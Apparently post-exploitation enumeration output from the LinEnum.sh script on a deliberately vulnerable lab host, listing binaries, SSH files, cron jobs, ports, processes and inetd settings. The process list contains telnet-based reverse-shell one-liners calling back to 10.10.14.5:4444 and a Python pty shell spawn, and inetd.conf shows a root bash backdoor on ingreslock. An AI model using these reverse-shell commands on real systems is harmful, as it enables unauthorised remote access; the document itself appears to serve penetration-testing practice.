-rwxr-xr-x 1 root root 5.8K Jul 30 2007 safe_finger
-rwxr-xr-x 1 root root 21K Apr 18 2008 sendmail
-rwxr-xr-x 1 root root 5.7K Feb 6 2008 setvesablank
-rwxr-xr-x 1 root root 3.0M Apr 28 2010 smbd
-rwxr-xr-x 1 root root 20K Apr 18 2008 smtp-sink
-rwxr-xr-x 1 root root 16K Apr 18 2008 smtp-source
-rwxr-xr-x 1 root root 24K Sep 24 2009 snmpd
-rwxr-xr-x 1 root root 27K Sep 24 2009 snmptrapd
-rwxr-xr-x 1 root root 2.4K Mar 9 2010 split-logfile
-rwxr-xr-x 1 root root 363K Apr 6 2008 sshd
lrwxrwxrwx 1 root root 17 May 20 2012 su-to-root -> ../bin/su-to-root
-rwxr-xr-x 1 root root 3.9K Nov 23 2007 syslog-facility
-rwxr-xr-x 1 root root 3.7K Nov 23 2007 syslogd-listfiles
-rwxr-xr-x 1 root root 4.4K Jul 30 2007 tcpd
-rwxr-xr-x 1 root root 17K Jul 30 2007 tcpdchk
-rwxr-xr-x 1 root root 14K Jul 30 2007 tcpdmatch
-rwxr-xr-x 1 root root 533K Nov 6 2007 tcpdump
-rwxr-xr-x 1 root root 4.6K Jul 30 2007 try-from
-rwxr-xr-x 1 root root 6.6K Apr 14 2008 tunelp
lrwxrwxrwx 1 root root 13 Apr 28 2010 udevmonitor -> /sbin/udevadm
-rwxr-xr-x 1 root root 44K Apr 7 2008 ufw
-rwxr-xr-x 1 root root 3.4K Apr 7 2008 unconfined
-rwxr-xr-x 1 root root 23K Feb 12 2008 update-alternatives
-rwxr-xr-x 1 root root 5.7K Oct 26 2004 update-catalog
-rwxr-xr-x 1 root root 4.7K Nov 13 2007 update-fonts-alias
-rwxr-xr-x 1 root root 4.0K Nov 13 2007 update-fonts-dir
-rwxr-xr-x 1 root root 6.1K Nov 13 2007 update-fonts-scale
-rwxr-xr-x 1 root root 3.4K Apr 22 2008 update-gconf-defaults
-rwxr-xr-x 1 root root 40K Dec 10 2009 update-grub
-rwxr-xr-x 1 root root 5.9K Oct 24 2007 update-inetd
-rwxr-xr-x 1 root root 9.5K Mar 11 2008 update-initramfs
-rwxr-xr-x 1 root root 3.0K Apr 1 2008 update-java-alternatives
-rwxr-xr-x 1 root root 2.8K Mar 11 2008 update-locale
-rwxr-xr-x 1 root root 6.2K Apr 1 2008 update-mime
-rwxr-xr-x 1 root root 2.2K May 5 2009 update-pangox-aliases
-rwxr-xr-x 1 root root 17K Nov 19 2007 update-passwd
-rwxr-xr-x 1 root root 13K Mar 31 2008 update-python-modules
-rwxr-xr-x 1 root root 5.5K Apr 19 2008 update-rc.d
-rwxr-xr-x 1 root root 644 Feb 24 2008 update-usbids
-rwxr-xr-x 1 root root 60K Apr 2 2008 useradd
-rwxr-xr-x 1 root root 39K Apr 2 2008 userdel
-rwxr-xr-x 1 root root 59K Apr 2 2008 usermod
-rwsr-sr-x 1 libuuid libuuid 13K Mar 27 2008 uuidd
-rwxr-xr-x 1 root root 1.8K Mar 11 2008 validlocale
-rwxr-xr-x 1 root root 6.1K Feb 6 2008 vcstime
lrwxrwxrwx 1 root root 4 Apr 28 2010 vidmode -> rdev
lrwxrwxrwx 1 root root 4 Apr 28 2010 vigr -> vipw
-rwxr-xr-x 1 root root 27K Apr 2 2008 vipw
-rwxr-xr-x 1 root root 68K Feb 25 2008 visudo
-rwxr-xr-x 1 root root 6.7K Jul 31 2007 vpddecode
-rwxr-xr-x 1 root root 107K May 20 2012 vsftpd
-rwxr-xr-x 1 root root 5.6K Feb 6 2008 writevt
-rwxr-xr-x 1 root root 3.9K Dec 3 2007 xconv.pl
-rwxr-xr-x 1 root root 135K Dec 3 2007 xinetd
-rwxr-xr-x 1 root root 34K Aug 17 2009 zic

SSH keys/host information found in the following locations:
-rw-r--r-- 1 root root 442 May 20 2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17 2010 /root/.ssh/authorized_keys

Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
Environment information:
_DISTCC_SAFEGUARD=1
TERM=linux
QUIET=no
PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=2
RUNLEVEL=2
UPSTART_EVENT=runlevel
PWD=/tmp
VERBOSE=no
previous=N
PREVLEVEL=N
SHLVL=7
UPSTART_JOB=rc2
UPSTART_JOB_ID=5
_=/usr/bin/env

Path information:
/sbin:/bin:/usr/sbin:/usr/bin

Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

Current umask value:
u=rwx,g=rx,o=rx
0022

Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7

### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 724 Apr 8 2008 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 May 14 2012 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rw-r--r-- 1 root root 492 Jan 6 2010 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common

/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 2008 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 Apr 8 2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 664 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 129 Apr 8 2008 standard

/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd

Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:aa:55:bf
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feaa:55bf/64 Scope:Global
inet6 addr: fe80::250:56ff:feaa:55bf/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:163459 errors:64 dropped:311 overruns:0 frame:0
TX packets:4306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:10439672 (9.9 MB) TX bytes:721734 (704.8 KB)
Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1774 errors:0 dropped:0 overruns:0 frame:0
TX packets:1774 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:861081 (840.8 KB) TX bytes:861081 (840.8 KB)

ARP history:
? (10.10.10.2) at 00:50:56:AA:C2:6E [ether] on eth0

Nameserver(s):
nameserver 10.10.10.2

Default route:
default 10.10.10.2 0.0.0.0 UG 100 0 0 eth0

Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:48456 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36779 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:35225 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:54617 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:57994 10.10.14.5:80 TIME_WAIT -
tcp 0 127 10.10.10.3:47835 10.10.14.5:4444 ESTABLISHED 7007/telnet
tcp 0 0 10.10.10.3:60649 10.10.14.5:4444 ESTABLISHED 6580/telnet
tcp 0 0 10.10.10.3:47834 10.10.14.5:4444 ESTABLISHED 7004/telnet
tcp6 0 0 :::2121 :::* LISTEN -
tcp6 0 0 :::3632 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -

Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:38530 0.0.0.0:* -
udp 0 0 10.10.10.3:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.10.3:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 127.0.0.1:161 0.0.0.0:* -
udp 0 0 127.0.0.1:43042 127.0.0.1:43042 ESTABLISHED -
udp 0 0 0.0.0.0:36270 0.0.0.0:* -
udp 0 0 10.10.10.3:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 0.0.0.0:995 0.0.0.0:* -
udp 0 0 0.0.0.0:32878 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:57470 0.0.0.0:* -
udp6 0 0 :::53 :::* -
udp6 0 0 :::51560 :::* -

### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 2844 1696 ? Ss 16:21 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 16:21 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 16:21 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 16:21 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 16:21 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 16:21 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 16:21 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 16:21 0:00 [kblockd/0]
root 64 0.0 0.0 0 0 ? S< 16:21 0:00 [kseriod]
root 182 0.0 0.0 0 0 ? S 16:21 0:00 [pdflush]
root 183 0.0 0.0 0 0 ? S 16:21 0:00 [pdflush]
root 184 0.0 0.0 0 0 ? S< 16:21 0:00 [kswapd0]
root 225 0.0 0.0 0 0 ? S< 16:21 0:00 [aio/0]
root 1245 0.0 0.0 0 0 ? S< 16:21 0:00 [ksnapd]
root 1436 0.0 0.0 0 0 ? S< 16:21 0:00 [ata/0]
root 1439 0.0 0.0 0 0 ? S< 16:21 0:00 [ata_aux]
root 1458 0.0 0.0 0 0 ? S< 16:21 0:00 [ksuspend_usbd]
root 1462 0.0 0.0 0 0 ? S< 16:21 0:00 [khubd]
root 2305 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_0]
root 2486 0.0 0.0 0 0 ? S< 16:21 0:00 [kjournald]
root 2552 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_1]
root 2553 0.0 0.0 0 0 ? S< 16:21 0:00 [scsi_eh_2]
root 2662 0.0 0.1 2216 648 ? S<s 16:21 0:00 /sbin/udevd --daemon
root 3017 0.0 0.0 0 0 ? S< 16:21 0:00 [kpsmoused]
root 3974 0.0 0.0 0 0 ? S< 16:21 0:00 [kjournald]
daemon 4193 0.0 0.1 1836 524 ? Ss 16:21 0:00 /sbin/portmap
statd 4211 0.0 0.1 1900 720 ? Ss 16:21 0:00 /sbin/rpc.statd
root 4217 0.0 0.0 0 0 ? S< 16:21 0:00 [rpciod/0]
root 4232 0.0 0.1 3648 564 ? Ss 16:21 0:00 /usr/sbin/rpc.idmapd
root 4459 0.0 0.0 1716 488 tty4 Ss+ 16:21 0:00 /sbin/getty 38400 tty4
root 4460 0.0 0.0 1716 488 tty5 Ss+ 16:21 0:00 /sbin/getty 38400 tty5
root 4466 0.0 0.0 1716 488 tty2 Ss+ 16:21 0:00 /sbin/getty 38400 tty2
root 4469 0.0 0.0 1716 488 tty3 Ss+ 16:21 0:00 /sbin/getty 38400 tty3
root 4471 0.0 0.0 1716 492 tty6 Ss+ 16:21 0:00 /sbin/getty 38400 tty6
syslog 4510 0.0 0.1 1936 640 ? Ss 16:21 0:00 /sbin/syslogd -u syslog
root 4561 0.0 0.1 1872 544 ? S 16:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 4563 0.0 0.4 3284 2120 ? Ss 16:21 0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind 4588 0.0 1.4 35408 7680 ? Ssl 16:21 0:00 /usr/sbin/named -u bind
root 4612 0.0 0.1 5312 1024 ? Ss 16:21 0:00 /usr/sbin/sshd
root 4693 0.0 0.2 2768 1304 ? S 16:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4735 0.0 3.3 127560 17044 ? Sl 16:21 0:03 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4737 0.0 0.1 1700 560 ? S 16:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres 4816 0.0 0.9 41340 5068 ? S 16:21 0:00 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 4819 0.0 0.2 41340 1376 ? Ss 16:21 0:03 postgres: writer process
postgres 4820 0.0 0.2 41340 1188 ? Ss 16:21 0:02 postgres: wal writer process
postgres 4821 0.0 0.2 41476 1404 ? Ss 16:21 0:00 postgres: autovacuum launcher process
postgres 4822 0.0 0.2 12660 1152 ? Ss 16:21 0:00 postgres: stats collector process
daemon 4843 0.0 0.0 2316 420 ? SNs 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4844 0.0 0.1 2316 564 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4898 0.0 0.0 0 0 ? S 16:21 0:00 [lockd]
root 4899 0.0 0.0 0 0 ? S< 16:21 0:00 [nfsd4]
root 4900 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4901 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4902 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4903 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4904 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4905 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4906 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4907 0.0 0.0 0 0 ? S 16:21 0:00 [nfsd]
root 4911 0.0 0.0 2424 332 ? Ss 16:21 0:00 /usr/sbin/rpc.mountd
root 4979 0.0 0.3 5412 1728 ? Ss 16:21 0:00 /usr/lib/postfix/master
postfix 4983 0.0 0.3 5460 1684 ? S 16:21 0:00 qmgr -l -t fifo -u
root 4987 0.0 0.2 5388 1192 ? Ss 16:21 0:00 /usr/sbin/nmbd -D
root 4989 0.0 0.2 7724 1440 ? Ss 16:21 0:00 /usr/sbin/smbd -D
root 4993 0.0 0.1 7724 816 ? S 16:21 0:00 /usr/sbin/smbd -D
snmp 4995 0.0 0.7 8488 3760 ? S 16:21 0:02 /usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1
root 5012 0.0 0.1 2424 868 ? Ss 16:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 5055 0.0 0.3 9948 1596 ? Ss 16:21 0:00 proftpd: (accepting connections)
daemon 5071 0.0 0.0 1984 420 ? Ss 16:21 0:00 /usr/sbin/atd
root 5084 0.0 0.1 2104 896 ? Ss 16:21 0:00 /usr/sbin/cron
root 5114 0.0 0.0 2052 352 ? Ss 16:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5115 0.0 0.0 2052 480 ? S 16:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55 5117 0.2 17.3 364160 89660 ? Sl 16:21 0:33 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 5137 0.0 0.4 10596 2556 ? Ss 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5138 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5140 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5142 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5146 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
www-data 5148 0.0 0.3 10596 1952 ? S 16:21 0:00 /usr/sbin/apache2 -k start
root 5158 0.0 5.1 66344 26476 ? Sl 16:21 0:00 /usr/bin/rmiregistry
root 5162 0.2 0.4 12208 2568 ? Sl 16:21 0:26 ruby /usr/sbin/druby_timeserver.rb
root 5174 0.0 0.0 1716 484 tty1 Ss+ 16:21 0:00 /sbin/getty 38400 tty1
root 5176 0.0 0.4 8540 2364 ? S 16:21 0:01 /usr/bin/unrealircd
root 5179 0.0 2.3 14016 12016 ? S 16:21 0:02 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
daemon 5184 0.0 0.1 2316 560 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 5188 0.0 0.2 2724 1184 ? S 16:21 0:00 /bin/sh /root/.vnc/xstartup
root 5191 0.0 0.4 5936 2564 ? S 16:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 5194 0.0 0.9 8984 5000 ? S 16:21 0:04 fluxbox
root 5197 0.0 0.3 2852 1548 pts/0 Ss+ 16:21 0:00 -bash
daemon 5238 0.0 0.1 2316 560 ? SN 16:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 6578 0.0 0.1 3240 844 ? SN 17:13 0:00 sh -c (sleep 4360|telnet 10.10.14.5 4444|while : ; do sh && break; done 2>&1|telnet 10.10.14.5 4444 >/dev/null 2>&1 &)
daemon 6579 0.0 0.2 3240 1468 ? SN 17:13 0:00 sh
daemon 6580 0.0 0.1 3164 1028 ? SN 17:13 0:00 telnet 10.10.14.5 4444
daemon 6588 52.3 0.4 3960 2472 ? RN 17:14 79:40 python -c import pty; pty.spawn("/bin/sh")
daemon 6589 0.0 0.3 3356 1724 pts/1 SNs+ 17:14 0:00 /bin/sh
postfix 7000 0.0 0.3 5420 1644 ? S 19:41 0:00 pickup -l -t fifo -u -c
daemon 7003 0.0 0.1 1848 528 ? SN 19:41 0:00 sleep 4521
daemon 7004 0.0 0.1 3164 1028 ? SN 19:41 0:00 telnet 10.10.14.5 4444
daemon 7005 0.0 0.1 3240 840 ? SN 19:41 0:00 sh -c (sleep 4521|telnet 10.10.14.5 4444|while : ; do sh && break; done 2>&1|telnet 10.10.14.5 4444 >/dev/null 2>&1 &)
daemon 7006 0.0 0.2 3236 1448 ? SN 19:41 0:00 sh
daemon 7007 0.0 0.2 3164 1048 ? SN 19:41 0:00 telnet 10.10.14.5 4444
daemon 7014 0.0 0.4 3960 2472 ? SN 19:42 0:00 python -c import pty; pty.spawn("/bin/sh")
daemon 7015 0.0 0.3 3356 1724 pts/2 SNs 19:42 0:00 /bin/sh
daemon 7027 0.5 0.3 3352 1624 pts/2 RN+ 19:46 0:00 /bin/bash ./LinEnum.sh -t
daemon 7376 0.0 0.1 3352 912 pts/2 RN+ 19:47 0:00 /bin/bash ./LinEnum.sh -t
daemon 7377 0.0 0.1 2364 928 pts/2 RN+ 19:47 0:00 ps aux

Process binaries & associated permissions (from above list):
692K -rwxr-xr-x 1 root root 686K Apr 14 2008 /bin/bash
48K -rwxr-xr-x 1 root root 48K Apr 4 2008 /bin/dd
0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> bash
16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/getty
92K -rwxr-xr-x 1 root root 88K Apr 11 2008 /sbin/init
24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd
16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap
40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd
32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd
72K -rwxr-xr-x 1 root root 67K Apr 11 2008 /sbin/udevd
32K -rwxr-xr-x 1 root root 31K May 21 2007 /usr/bin/jsvc
0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20 2012 /usr/bin/unrealircd
28K -rwxr-xr-x 1 root root 28K Apr 18 2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21 2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2
16K -rwxr-xr-x 1 root root 16K Feb 20 2007 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K Apr 8 2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28 2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr 9 2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd
76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28 2010 /usr/sbin/smbd
24K -rwxr-xr-x 1 root root 24K Sep 24 2009 /usr/sbin/snmpd
368K -rwxr-xr-x 1 root root 363K Apr 6 2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd

Contents of /etc/inetd.conf:
#<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
#<off># ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
tftp dgram udp wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd /srv/tftp
shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd
login stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rlogind
exec stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i

The related inetd binary permissions:
-rwxr-xr-x 1 root root 8216 Nov 22 2007 /usr/sbin/in.rexecd
-rwxr-xr-x 1 root root 15620 Nov 22 2007 /usr/sbin/in.rlogind
-rwxr-xr-x 1 root root 14684 Nov 22 2007 /usr/sbin/in.rshd
-rwxr-xr-x 1 root root 36504 Dec 17 2006 /usr/sbin/in.telnetd
-rwxr-xr-x 1 root root 11596 Dec 17 2006 /usr/sbin/in.tftpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd

Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{

# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

}

includedir /etc/xinetd.d

/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below: ls -la /etc/xinetd.d

/etc/init.d/ binary permissions:
total 376
drwxr-xr-x 2 root root 4096 May 20 2012 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 1335 Apr 19 2008 README
-rwxr-xr-x 1 root root 5736 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 2653 Apr 7 2008 apparmor
-rwxr-xr-x 1 root root 969 Feb 20 2007 atd
-rwxr-xr-x 1 root root 2426 Apr 9 2008 bind9
